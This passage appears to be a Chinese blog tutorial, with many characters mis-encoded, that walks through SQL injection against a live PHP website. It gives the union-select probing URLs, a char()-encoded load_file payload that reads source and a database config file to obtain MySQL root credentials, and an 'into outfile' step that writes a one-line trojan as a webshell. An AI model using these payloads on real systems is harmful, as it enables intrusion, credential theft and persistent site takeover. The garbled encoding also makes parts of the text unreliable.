下面我們來看一下php注入的過程。

因?yàn)槭蔷W(wǎng)絡(luò)上的主機(jī)，這里僅作注入測試，不作進(jìn)一步的具體操作。我們首先在網(wǎng)站后面加個單引號字符，返回錯誤信息，證明該網(wǎng)站有可能存在注入。再提交 and 1=1 正常顯示，提交and 1=2顯示錯誤，好，繼續(xù)提交union注入語句。http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1 同樣顯示錯誤信息。但網(wǎng)站路徑我們可以知道，并且是一臺linux系統(tǒng)/home/caiqing/www/view_detail.php，繼續(xù)提交
http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2直到網(wǎng)站正常顯示時為http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 這時再輸入http://www.xxx.net/view_datail.php?id=357 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11時出現(xiàn)如圖顯示：

圖片中出現(xiàn)數(shù)字3,5,8,9,7等數(shù)字，我們再對照一下原網(wǎng)頁就清楚了，可以看到在前面一圖中的數(shù)字3,5,7處為字符型，我們可以采用load_file語句來顯示網(wǎng)站中的源代碼，我們可以順利地拿到mysql的帳號和密碼。
接下來將/home/caiqing/www/view_detail.php轉(zhuǎn)化為ascii后為：char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112 ,104,112)采用load_file的方式加在數(shù)字7處，如下：
http://www.xxx.net/view_datail.php?id=357 and 1=2 union select 1,2,3,4,5,6,load_file(char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112 ,104,112)),8,9,10,11
如圖：

我們看到有一個config.php可能就是數(shù)據(jù)庫配置文件了，我們再用同樣的方式顯示出來這個網(wǎng)站的數(shù)據(jù)庫配置文件，最后取得mysql的帳號和密碼，還是root權(quán)限的，我們可以直接采用上面所說的創(chuàng)建一個表，加入一句話馬，再用select * from rose into outfile "/home/caiqing/www/shelll.php ";得到一個webshell。也可以利用數(shù)據(jù)表中的用戶表在url中執(zhí)行select語句并將管理員用戶名和密碼顯示在數(shù)字3和5中，介于我們這里只是作技術(shù)分析，不詳解。

最新評論